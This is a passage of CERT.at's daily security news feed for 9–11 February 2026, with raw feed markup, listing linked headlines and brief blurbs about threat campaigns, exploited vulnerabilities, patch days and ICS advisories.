I love my Shelly devices. They are an essential part of my smart home setup. I use them for everything from lights and plugs to garage doors and garden sprinkler control! One of the first Shelly devices I installed about five years ago recently stopped working, so I replaced it with one of their new fourth-generation Shelly 1 devices. That's when I noticed an issue I hadn't seen in previous generations.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.pentestpartners.com/security-blog/shelly-iot-door-controller-config-fail-leaving-your-garage-home-and-security-exposed/&quot;&gt;https://www.pentestpartners.com/security-blog/shelly-iot-door-controller-config-fail-leaving-your-garage-home-and-security-exposed/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Recovery scam: How fraud victims are harmed a second time&lt;/h3&gt;

Many victims wish to recover money lost to online fraud. And it is precisely this wish that criminals try to exploit for their own ends. With the so-called &quot;recovery scam&quot; they take additional money from people who have already been defrauded. In the example case, it concerns allegedly recovered crypto assets and advance payments supposedly required for the return transfer. The bait: the website betrugsrecht(.)de.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/recovery-scam-erneut-geschaedigt/&quot;&gt;https://www.watchlist-internet.at/news/recovery-scam-erneut-geschaedigt/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;A Peek Into Muddled Libra's Operational Playbook&lt;/h3&gt;

Explore the tools Unit 42 found on a Muddled Libra rogue host. Learn how they target domain controllers and use search engines to aid their attacks.
&lt;p /&gt;
&lt;A HREF=&quot;https://unit42.paloaltonetworks.com/muddled-libra-ops-playbook/&quot;&gt;https://unit42.paloaltonetworks.com/muddled-libra-ops-playbook/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cybersecurity at home: Private households as an underestimated attack surface&lt;/h3&gt;

Smartphones, smart home systems, cloud services and networked household appliances have long been an integral part of everyday life. But while companies and public authorities can rely on established standards, defined processes and available expertise, IT security in the private sphere mostly remains unregulated: insufficient know-how, shared passwords and insecure configuration of jointly used devices considerably increase the digital risk in many families and shared households.
&lt;p /&gt;
&lt;A HREF=&quot;https://certitude.consulting/blog/de/cybersicherheit-zuhause-privathaushalte-als-unterschatzte-angriffsflache/&quot;&gt;https://certitude.consulting/blog/de/cybersicherheit-zuhause-privathaushalte-als-unterschatzte-angriffsflache/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure&lt;/h3&gt;

This joint Cybersecurity Advisory is being published as an addition to the Cybersecurity and Infrastructure Security Agency (CISA) May 6, 2025, joint fact sheet Primary Mitigations to Reduce Cyber Threats to Operational Technology and European Cybercrime Centre's (EC3) Operation Eastwood, in which CISA, Federal Bureau of Investigation (FBI), Department of Energy (DOE), Environmental Protection Agency (EPA), and EC3 shared information about cyber incidents affecting the operational technology (OT) and industrial control systems (ICS) of critical infrastructure entities in the United States and globally.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-343a&quot;&gt;https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-343a&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Love Is in the Air - and So Are Scammers: Valentine's Day 2026 Threats to Watch For&lt;/h3&gt;

As Valentine's Day 2026 approaches, people are turning to online shopping, digital dating, and last-minute gift ideas. Unfortunately, cyber criminals are doing the same. Check Point researchers have identified a sharp rise in Valentine-themed phishing websites, fraudulent stores, and fake dating platforms designed to steal personal data and payment information.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.checkpoint.com/research/love-is-in-the-air-and-so-are-scammers-valentines-day-2026-threats-to-watch-for/&quot;&gt;https://blog.checkpoint.com/research/love-is-in-the-air-and-so-are-scammers-valentines-day-2026-threats-to-watch-for/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Active Ivanti Exploitation Traced to Single Bulletproof IP; Published IOC Lists Point Elsewhere&lt;/h3&gt;

The GreyNoise Global Observation Grid observed active exploitation of two critical Ivanti Endpoint Manager Mobile vulnerabilities, and 83% of that exploitation traces to a single IP address on bulletproof hosting infrastructure that does not appear on widely circulated IOC lists.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.greynoise.io/blog/active-ivanti-exploitation&quot;&gt;https://www.greynoise.io/blog/active-ivanti-exploitation&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hope Is Not a Security Strategy: Why Secure-by-Default Beats Hardening&lt;/h3&gt;

Security has always assumed deterministic behavior. We can't write policy to prevent bad outcomes when we don't even know what the agent will do. Sandboxing is the natural answer: everyone is buying Mac Minis to run Moltbot (OpenClaw now), Docker is using microVMs for coding agent sandboxes, and countless projects offer sandboxing tools for AI agents.
&lt;p /&gt;
&lt;A HREF=&quot;https://tuananh.net/2026/02/09/hope-is-not-a-security-strategy/&quot;&gt;https://tuananh.net/2026/02/09/hope-is-not-a-security-strategy/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Security vulnerabilities: Attacks on Windows, Office and Internet Explorer&lt;/h3&gt;

In terms of the number of security vulnerabilities closed on Microsoft's Patch Tuesday, February is once again somewhat milder than January. However, among them are no fewer than six vulnerabilities that are already being actively exploited. Affected are not only Windows systems but also Microsoft Office and the supposedly dead Internet Explorer. Users should patch promptly to protect themselves.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/microsoft-patchday-zero-day-luecken-in-windows-office-und-im-internet-explorer-2602-205258.html&quot;&gt;https://www.golem.de/news/microsoft-patchday-zero-day-luecken-in-windows-office-und-im-internet-explorer-2602-205258.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Patch day at Adobe: After Effects &amp; Co. vulnerable to malicious code attacks&lt;/h3&gt;

Security patches close several vulnerabilities in Adobe applications. So far there are no reports of attacks.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Patchday-bei-Adobe-After-Effects-Co-fuer-Schadcode-Attacken-anfaellig-11172390.html&quot;&gt;https://www.heise.de/news/Patchday-bei-Adobe-After-Effects-Co-fuer-Schadcode-Attacken-anfaellig-11172390.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;800,000 WordPress Sites Affected by Arbitrary File Upload Vulnerability in WPvivid Backup WordPress Plugin&lt;/h3&gt;

On January 12th, 2026, we received a submission for an Arbitrary File Upload vulnerability in WPvivid Backup, a WordPress plugin with more than 800,000 active installations. This vulnerability can be used by unauthenticated attackers to upload arbitrary files to a vulnerable site and achieve remote code execution, which is typically leveraged for a complete site takeover.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.wordfence.com/blog/2026/02/800000-wordpress-sites-affected-by-arbitrary-file-upload-vulnerability-in-wpvivid-backup-wordpress-plugin/&quot;&gt;https://www.wordfence.com/blog/2026/02/800000-wordpress-sites-affected-by-arbitrary-file-upload-vulnerability-in-wpvivid-backup-wordpress-plugin/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;TP-Link Systems Inc. VIGI Series IP Camera&lt;/h3&gt;

Successful exploitation of this vulnerability could result in unauthorized users gaining administrative access to affected closed circuit television cameras.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-036-01&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-036-01&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN Security updates for Wednesday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1058265/&quot;&gt;https://lwn.net/Articles/1058265/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-11T19:13:57Z</dc:date></entry><entry><title>Tageszusammenfassung - 10.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-10022026"/><author><name>CERT.at</name></author><updated>2026-02-10T18:40:14Z</updated><published>2026-02-10T18:40:14Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Monday 09-02-2026 18:00 - Tuesday 10-02-2026 18:00
Handler:     Guenes Holler
Co-Handler:  Felician Fuchs


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Hackers breach SmarterTools network using flaw in its own software&lt;/h3&gt;

SmarterTools confirmed last week that the Warlock ransomware gang breached its network after compromising an email system, but that the breach did not impact business applications or account data.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/hackers-breach-smartertools-network-using-flaw-in-its-own-software/&quot;&gt;https://www.bleepingcomputer.com/news/security/hackers-breach-smartertools-network-using-flaw-in-its-own-software/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ZeroDayRAT malware grants full access to Android, iOS devices&lt;/h3&gt;

A new commercial mobile spyware platform dubbed ZeroDayRAT is being advertised to cybercriminals on Telegram as a tool that provides full remote control over compromised Android and iOS devices.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/zerodayrat-malware-grants-full-access-to-android-ios-devices/&quot;&gt;https://www.bleepingcomputer.com/news/security/zerodayrat-malware-grants-full-access-to-android-ios-devices/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Trojan on board: Malware-infected 7-Zip version in circulation&lt;/h3&gt;

Anyone downloading the archiver 7-Zip should pay close attention to the correct domain. A malware-infected version has been spotted.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/trojaner-an-bord-mit-schadcode-verseuchte-7-zip-versionen-in-umlauf-2602-205223.html&quot;&gt;https://www.golem.de/news/trojaner-an-bord-mit-schadcode-verseuchte-7-zip-versionen-in-umlauf-2602-205223.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Dutch Authorities Confirm Ivanti Zero-Day Exploit Exposed Employee Contact Data&lt;/h3&gt;

The Dutch Data Protection Authority (AP) and the Council for the Judiciary (Rvdr) have disclosed that their systems were impacted by cyber attacks that exploited the recently disclosed security flaws in Ivanti Endpoint Manager Mobile (EPMM), according to a notice sent to the country's parliament on Friday.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/dutch-authorities-confirm-ivanti-zero.html&quot;&gt;https://thehackernews.com/2026/02/dutch-authorities-confirm-ivanti-zero.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Reynolds Ransomware Embeds BYOVD Driver to Disable EDR Security Tools&lt;/h3&gt;

Cybersecurity researchers have disclosed details of an emergent ransomware family dubbed Reynolds that comes embedded with a built-in bring your own vulnerable driver (BYOVD) component for defense evasion purposes within the ransomware payload itself.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/reynolds-ransomware-embeds-byovd-driver.html&quot;&gt;https://thehackernews.com/2026/02/reynolds-ransomware-embeds-byovd-driver.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;More than 135,000 OpenClaw instances exposed to internet in latest vibe-coded disaster&lt;/h3&gt;

By default, the bot listens on all network interfaces, and many users never change it. It's a day with a name ending in Y, so you know what that means: another OpenClaw cybersecurity disaster.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/02/09/openclaw_instances_exposed_vibe_code/&quot;&gt;https://www.theregister.com/2026/02/09/openclaw_instances_exposed_vibe_code/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Introducing Augustus: Open Source LLM Prompt Injection Tool&lt;/h3&gt;

Last month we released Julius, a tool that answers the question: &quot;what LLM service is running on this endpoint?&quot; Julius identifies the infrastructure. But identification is only the first step. The natural follow-up: &quot;now that I know what's running, how do I test whether it's secure?&quot; That's what Augustus does.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.praetorian.com/blog/introducing-augustus-open-source-llm-prompt-injection/&quot;&gt;https://www.praetorian.com/blog/introducing-augustus-open-source-llm-prompt-injection/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Patch now! Attacks on SolarWinds Web Help Desk observed once again&lt;/h3&gt;

According to security researchers, attackers are currently exploiting critical code-execution vulnerabilities in SolarWinds Web Help Desk.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Jetzt-patchen-Abermals-Attacken-auf-SolarWinds-Web-Help-Desk-beobachtet-11170887.html&quot;&gt;https://www.heise.de/news/Jetzt-patchen-Abermals-Attacken-auf-SolarWinds-Web-Help-Desk-beobachtet-11170887.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Archive.today: Operator uses visitors for DDoS attack&lt;/h3&gt;

The operator of Archive.today is using visitors to his site, without their knowledge, for a DDoS attack. The target is a Finnish blogger.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Archive-today-Betreiber-setzt-Nutzer-fuer-DDoS-Attacke-ein-11170623.html&quot;&gt;https://www.heise.de/news/Archive-today-Betreiber-setzt-Nutzer-fuer-DDoS-Attacke-ein-11170623.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;North Korean hackers targeted crypto exec with fake Zoom meeting, ClickFix scam&lt;/h3&gt;

The scam involved a ClickFix attack where hackers install malware on a device by having the victim try to resolve fictitious technical issues.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/north-korean-hackers-targeted-crypto-exec-clickfix&quot;&gt;https://therecord.media/north-korean-hackers-targeted-crypto-exec-clickfix&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Pride Month Phishing Targets Employees via Trusted Email Services&lt;/h3&gt;

Attackers are using Pride Month themed phishing emails to target employees worldwide, abusing trusted email platforms like SendGrid to harvest credentials.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/pride-month-phishing-employees-trusted-email-services/&quot;&gt;https://hackread.com/pride-month-phishing-employees-trusted-email-services/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;New Cybercrime Group 0APT Accused of Faking Hundreds of Breach Claims&lt;/h3&gt;

Researchers reveal the new 0APT cyber group is fabricating attacks on large organisations. Learn how they use fake data to trick companies into paying.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/cybercrime-group-0apt-faking-breach-claims/&quot;&gt;https://hackread.com/cybercrime-group-0apt-faking-breach-claims/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Beyond the Battlefield: Threats to the Defense Industrial Base&lt;/h3&gt;

Introduction In modern warfare, the front lines are no longer confined to the battlefield; they extend directly into the servers and supply chains of the industry that safeguards the nation. Today, the defense sector faces a relentless barrage of cyber operations conducted by state-sponsored actors and criminal groups alike.
&lt;p /&gt;
&lt;A HREF=&quot;https://cloud.google.com/blog/topics/threat-intelligence/threats-to-defense-industrial-base/&quot;&gt;https://cloud.google.com/blog/topics/threat-intelligence/threats-to-defense-industrial-base/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps&lt;/h3&gt;

The purpose of this Alert is to amplify Poland's Computer Emergency Response Team (CERT Polska's) Energy Sector Incident Report published on Jan. 30, 2026, and highlight key mitigations for Energy Sector stakeholders.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps&quot;&gt;https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Deep Dive into New XWorm Campaign Utilizing Multiple-Themed Phishing Emails&lt;/h3&gt;

FortiGuard Labs recently captured a phishing campaign in the wild delivering a new variant of XWorm. XWorm is a multi-functional Remote Access Trojan (RAT) first identified in 2022 that remains actively distributed, including through Telegram-based marketplaces. Once deployed, it provides attackers with full remote control of compromised Windows systems.
&lt;p /&gt;
&lt;A HREF=&quot;https://feeds.fortinet.com/~/945702296/0/fortinet/blogs~Deep-Dive-into-New-XWorm-Campaign-Utilizing-MultipleThemed-Phishing-Emails&quot;&gt;https://feeds.fortinet.com/~/945702296/0/fortinet/blogs~Deep-Dive-into-New-XWorm-Campaign-Utilizing-MultipleThemed-Phishing-Emails&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Tech impersonators: ClickFix and MacOS infostealers&lt;/h3&gt;

Datadog identified an active campaign employing fake GitHub repositories impersonating software companies and leveraging the ClickFix initial access technique to deliver macOS infostealers.
&lt;p /&gt;
&lt;A HREF=&quot;https://securitylabs.datadoghq.com/articles/tech-impersonators-clickfix-and-macos-infostealers/&quot;&gt;https://securitylabs.datadoghq.com/articles/tech-impersonators-clickfix-and-macos-infostealers/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Security updates for Tuesday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (fence-agents, firefox, fontforge, freerdp, kernel-rt, keylime, libsoup, libsoup3, nodejs22, nodejs24, opentelemetry-collector, osbuild-composer, python3.12-wheel, qemu-kvm, resource-agents, thunderbird, and util-linux), Debian (kernel, rlottie, shaarli, and usbmuxd), Fedora (asciinema, atuin, bustle, cef, envision, glycin, greetd, helix, java-21-openjdk, java-25-openjdk, java-latest-openjdk, keylime-agent-rust, maturin, mirrorlist-server, ntpd-rs, python3.6, rust-add-determinism, rust-afterburn, rust-ambient-id, rust-app-store-connect, rust-bat, rust-below, rust-btrd, rust-busd, rust-bytes, rust-cargo-c, rust-cargo-deny, rust-coreos-installer, rust-crypto-auditing-agent, rust-crypto-auditing-client, rust-crypto-auditing-event-broker, rust-crypto-auditing-log-parser, rust-dua-cli, rust-eif_build, rust-git-delta, rust-git-interactive-rebase-tool, rust-git2, rust-gst-plugin-dav1d, rust-gst-plugin-reqwest, rust-heatseeker, rust-ingredients, rust-jsonwebtoken, rust-lsd, rust-monitord, rust-monitord-exporter, rust-muvm, rust-nu, rust-num-conv, rust-onefetch, rust-oo7-cli, rust-pleaser, rust-pore, rust-pretty-git-prompt, rust-procs, rust-rbspy, rust-rbw, rust-rd-agent, rust-rd-hashd, rust-redlib, rust-resctl-bench, rust-resctl-demo, rust-routinator, rust-sccache, rust-scx_layered, rust-scx_rustland, rust-scx_rusty, rust-sequoia-chameleon-gnupg, rust-sequoia-keystore-server, rust-sequoia-octopus-librnp, rust-sequoia-sq, rust-sevctl, rust-shadow-rs, rust-sigul-pesign-bridge, rust-snpguest, rust-speakersafetyd, rust-tealdeer, rust-time, rust-time-core, rust-time-macros, rust-tokei, rust-weezl, rust-wiremix, rust-ybaas, rustup, sad, tbtools, tuigreet, and uv), Mageia (fontforge and nginx), Oracle (firefox, fontforge, freerdp, kernel, keylime, libsoup, python, thunderbird, and uek-kernel), SUSE (abseil-cpp and kernel), and Ubuntu (freerdp2 and libsoup3).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1057993/&quot;&gt;https://lwn.net/Articles/1057993/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;XSS via back button&lt;/h3&gt;

An Improper Neutralization of Input During Web Page Generation (Cross-site Scripting) vulnerability [CWE-79] in FortiSandbox may allow an unauthenticated attacker to execute commands via crafted requests. FortiSandbox PaaS versions 4.4.8 and 5.0.5 contain the fix for this vulnerability.
&lt;p /&gt;
&lt;A HREF=&quot;https://fortiguard.fortinet.com/psirt/FG-IR-25-093&quot;&gt;https://fortiguard.fortinet.com/psirt/FG-IR-25-093&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Serious vulnerabilities uncovered in Google Looker&lt;/h3&gt;

A small addendum to a piece of information that reached me a few days ago. Security researchers from Tenable Research have discovered two serious security vulnerabilities in Google Looker and dubbed them &quot;LookOut&quot;. Attackers can take over entire systems in order to steal company secrets.
&lt;p /&gt;
&lt;A HREF=&quot;https://borncity.com/blog/2026/02/09/schwerwiegende-schwachstellen-in-google-looker-aufgedeckt/&quot;&gt;https://borncity.com/blog/2026/02/09/schwerwiegende-schwachstellen-in-google-looker-aufgedeckt/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;February 2026 Security Update&lt;/h3&gt;

Ivanti releases standard security patches on the second Tuesday of every month. Our vulnerability management program is central to our commitment to maintaining secure products. Our philosophy is simple: discovering and communicating vulnerabilities, and sharing that information with defenders, is not an indication of weakness; rather it is evidence of rigorous scrutiny and a proactive vulnerability management program.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.ivanti.com/blog/february-2026-security-update&quot;&gt;https://www.ivanti.com/blog/february-2026-security-update&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Roundcube 1.7 RC3 released&lt;/h3&gt;

We just published the third release candidate for the next major version 1.7 of Roundcube webmail. This release fixes two security issues, and contains a few more fixes for several issues.
&lt;p /&gt;
&lt;A HREF=&quot;https://roundcube.net/news/2026/02/09/roundcube-1.7-rc3-released&quot;&gt;https://roundcube.net/news/2026/02/09/roundcube-1.7-rc3-released&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Attacks on BeyondTrust Remote Support and Privileged Remote Access possible&lt;/h3&gt;

Two remote support solutions from BeyondTrust are vulnerable. Security updates close a critical vulnerability.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11171444&quot;&gt;https://heise.de/-11171444&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;SAP Security Patch Day February 2026&lt;/h3&gt;

SAP has released its February 2026 security patch package containing 27 security notes addressing critical vulnerabilities across enterprise SAP environments. This release includes two HotNews vulnerabilities with CVSS ratings up to 9.9, seven High priority issues, sixteen Medium priority fixes, and two Low priority updates.
&lt;p /&gt;
&lt;A HREF=&quot;https://redrays.io/blog/sap-security-patch-day-february-2026/&quot;&gt;https://redrays.io/blog/sap-security-patch-day-february-2026/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Yokogawa FAST/TOOLS&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-041-01&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-041-01&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;AVEVA PI Data Archive&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-041-03&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-041-03&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ZLAN Information Technology Co. ZLAN5143D&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-041-02&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-041-02&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-10T18:40:14Z</dc:date></entry><entry><title>Tageszusammenfassung - 09.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-09022026"/><author><name>CERT.at</name></author><updated>2026-02-09T18:31:49Z</updated><published>2026-02-09T18:31:49Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Friday 06-02-2026 18:00 - Monday 09-02-2026 18:00
Handler:     Alexander Riepl
Co-Handler:  Guenes Holler


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Data exfiltration suspected: Cyberattack hits EU Commission&lt;/h3&gt;

Hackers have succeeded in a cyberattack on the EU Commission. The point of entry was a mobile device management system - presumably from Ivanti.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/datenabfluss-moeglich-cyberangriff-trifft-eu-kommission-2602-205154.html&quot;&gt;https://www.golem.de/news/datenabfluss-moeglich-cyberangriff-trifft-eu-kommission-2602-205154.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;TeamPCP Worm Exploits Cloud Infrastructure to Build Criminal Infrastructure&lt;/h3&gt;

Cybersecurity researchers have called attention to a &quot;massive campaign&quot; that has systematically targeted cloud native environments to set up malicious infrastructure for follow-on exploitation.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/teampcp-worm-exploits-cloud.html&quot;&gt;https://thehackernews.com/2026/02/teampcp-worm-exploits-cloud.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Technical Analysis of GuLoader Obfuscation Techniques&lt;/h3&gt;

In this blog post, Zscaler ThreatLabz explores the anti-analysis techniques that GuLoader employs including polymorphic code to dynamically construct constant and string values, as well as complex exception-based control flow obfuscation.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.zscaler.com/blogs/security-research/technical-analysis-guloader-obfuscation-techniques&quot;&gt;https://www.zscaler.com/blogs/security-research/technical-analysis-guloader-obfuscation-techniques&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Novel Technique to Detect Cloud Threat Actor Operations&lt;/h3&gt;

Cloud-based alerting systems often struggle to distinguish between normal cloud activity and targeted malicious operations by known threat actors. The difficulty doesn't lie in an inability to identify complex alerting operations across thousands of cloud resources or in a failure to follow identity resources; the problem lies in the accurate detection of known persistent threat actor group techniques specifically within cloud environments.
&lt;p /&gt;
&lt;A HREF=&quot;https://unit42.paloaltonetworks.com/tracking-threat-groups-through-cloud-logging/&quot;&gt;https://unit42.paloaltonetworks.com/tracking-threat-groups-through-cloud-logging/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;AI assistant OpenClaw gets VirusTotal at its side&lt;/h3&gt;

The developer of OpenClaw intends to curb the spread of malware skills through a partnership with VirusTotal.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11169414&quot;&gt;https://heise.de/-11169414&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Evaluating and mitigating the growing risk of LLM-discovered 0-days&lt;/h3&gt;

Claude Opus 4.6, released today, continues a trajectory of meaningful improvements in AI models' cybersecurity capabilities. Last fall, we wrote that we believed we were at an inflection point for AI's impact on cybersecurity: progress could become quite fast, and now was the moment to accelerate defensive use of AI. The evidence since then has only reinforced that view. AI models can now find high-severity vulnerabilities at scale. Our view is this is a moment to move quickly, to empower defenders and secure as much code as possible while the window exists.
&lt;p /&gt;
&lt;A HREF=&quot;https://red.anthropic.com/2026/zero-days/&quot;&gt;https://red.anthropic.com/2026/zero-days/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Security updates for Monday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (fontforge, kernel, and osbuild-composer), Debian (debian-security-support, sudo, wireshark, xrdp, and zabbix), Fedora (bind, bind-dyndb-ldap, chromium, k9s, libgit2, mingw-glib2, node-exporter, open-vm-tools, plantuml, xorgxrdp, and xrdp), Oracle (fence-agents, image-builder, kernel, libsoup3, and osbuild-composer), Red Hat (image-builder and osbuild-composer), Slackware (openssl and p11), SUSE (chromium, cockpit-354, cockpit-machines, cockpit-machines-346, cockpit-packages, cockpit-podman, cockpit-subscriptions, govulncheck-vulndb, kubernetes-old, libsnmp45-32bit, libxml2, localsearch, micropython, opencloud-server, python-django, python-djangorestframework, python-maturin, python311-Django, python311-wheel, python315, sqlite3, and xrdp), and Ubuntu (linux-fips, linux-aws-fips, linux-gcp-fips and python-pip).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1057759/&quot;&gt;https://lwn.net/Articles/1057759/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Ivanti EPMM (CVE-2026-1281 &amp; CVE-2026-1340) Exploitation Detection RPM Package&lt;/h3&gt;

Ivanti has released updates for Endpoint Manager Mobile (EPMM) which addresses two critical severity vulnerabilities. Successful exploitation could lead to unauthenticated remote code execution. We are aware of a very limited number of customers whose solution has been exploited at the time of disclosure. 
&lt;p /&gt;
&lt;A HREF=&quot;https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US&quot;&gt;https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;BeyondTrust warns of critical RCE flaw in remote support software&lt;/h3&gt;

BeyondTrust warned customers to patch a critical security flaw in its Remote Support (RS) and Privileged Remote Access (PRA) software that could allow unauthenticated attackers to execute arbitrary code remotely.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/beyondtrust-warns-of-critical-rce-flaw-in-remote-support-software/&quot;&gt;https://www.bleepingcomputer.com/news/security/beyondtrust-warns-of-critical-rce-flaw-in-remote-support-software/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft addresses critical security vulnerability in the Azure environment&lt;/h3&gt;

Microsoft's multi-cloud management solution Azure Arc, the serverless development environment Azure Functions and the content delivery network (CDN) Azure Front Door were vulnerable. The technology company rates the overall risk as critical.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Microsoft-kuemmert-sich-um-kritische-Sicherheitsluecke-im-Azure-Umfeld-11169145.html&quot;&gt;https://www.heise.de/news/Microsoft-kuemmert-sich-um-kritische-Sicherheitsluecke-im-Azure-Umfeld-11169145.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malicious code vulnerability in FortiClient EMS can compromise PCs&lt;/h3&gt;

Admins who manage company computers with FortiClient Endpoint Management Server (EMS) should promptly bring the application up to date for security reasons. A vulnerability in a specific version can let malicious code onto systems.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11170228&quot;&gt;https://heise.de/-11170228&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates 1.6.13 and 1.5.13 released&lt;/h3&gt;

We just published security updates to the 1.6 and 1.5 LTS versions of Roundcube Webmail. They both contain fixes for two recently reported security vulnerabilities.
&lt;p /&gt;
